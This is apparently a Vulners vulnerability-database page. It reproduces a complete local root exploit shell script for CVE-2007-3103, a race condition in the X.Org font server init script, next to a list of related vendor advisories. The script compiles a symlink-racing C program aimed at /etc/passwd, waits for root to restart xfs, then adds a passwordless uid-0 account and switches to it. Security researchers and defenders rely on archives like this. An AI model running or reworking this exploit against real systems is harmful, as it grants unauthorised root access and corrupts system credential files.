Vulners
Lucene search
X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition
| Reporter | Title | Published | Views | Family All 49 |
|---|---|---|---|---|
 | X.Org xorg-x11-xfs <= 1.0.2-3.1 Local Race Condition Exploit | 21 Feb 200800:00 | – | zdt |
 | CentOS 4 : xorg-x11 (CESA-2007:0519) | 18 Jul 200700:00 | – | nessus |
| CentOS 5 : xorg-x11-xfs (CESA-2007:0520) | 6 Jan 201000:00 | – | nessus |
| Debian DSA-1342-1 : xfs - race condition | 1 Aug 200700:00 | – | nessus |
| Fedora 10 : xorg-x11-xfs-1.0.5-3.1.fc10 (2009-3651) | 3 Jul 200900:00 | – | nessus |
| Fedora 9 : xorg-x11-xfs-1.0.5-2.1.fc9 (2009-3666) | 3 Jul 200900:00 | – | nessus |
| GLSA-200710-11 : X Font Server: Multiple Vulnerabilities | 15 Oct 200700:00 | – | nessus |
| Oracle Linux 4 : xorg-x11 (ELSA-2007-0519) | 12 Jul 201300:00 | – | nessus |
| Oracle Linux 5 : Moderate: / xorg-x11-xfs (ELSA-2007-0520) | 12 Jul 201300:00 | – | nessus |
| RHEL 4 : xorg-x11 (RHSA-2007:0519) | 18 Jul 200700:00 | – | nessus |
10
#!/bin/sh
# Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103)
#
# Another lame xploit by vl4dZ :)) works on redhat el5 and before
#
# $ id
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# $ sh xfs-RaceCondition-root-exploit.sh
# [*] Generate large data file in /tmp/.font-unix
# [*] Wait for xfs service to be (re)started by root...
# [*] Hop, symlink created...
# [*] Launching root shell
# -sh-3.1# id
# uid=0(root) gid=0(root) groups=0(root)
# Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is
# located in the start() function of the /etc/init.d/xfs script:
# ...
# rm -rf $FONT_UNIX_DIR
# mkdir $FONT_UNIX_DIR
# chown root:root $FONT_UNIX_DIR
# chmod 1777 $FONT_UNIX_DIR
# ...
# I'm listening right now to nice free music:
# http://www.jamendo.com/fr/album/5919
FontDir="/tmp/.font-unix"
Zero=/dev/zero
Size=900000
if [ ! -d $FontDir ]; then
printf "Is xfs running ?\n"
exit 1
fi
cd /tmp
cat > sym.c << EOF
#include <unistd.h>
int main(){
for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0)
{return 0;}}}
EOF
cc sym.c -o sym>/dev/null 2>&1
if [ $? != 0 ]; then
printf "Error: Cant compile code"
exit 1
fi
printf "[*] Generate large data file in $FontDir\n"
dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1
if [ $? != 0 ]; then
printf "Error: cant create large file"
exit 1
fi
printf "[*] Wait for xfs service to be (re)started by root...\n"
./sym
if [ $? != 0 ]; then
printf "Error: code failed...\n"
exit 1
fi
if [ -L /tmp/.font-unix ]; then
printf "[*] Hop, symlink created...\n"
printf "[*] Launching root shell\n"
sleep 2
rm -f /tmp/.font-unix
echo "r00t::0:0::/:/bin/sh" >> /etc/passwd
fi
su - r00t
# milw0rm.com [2008-02-21]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Feb 2008 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 26.2
EPSS0.00081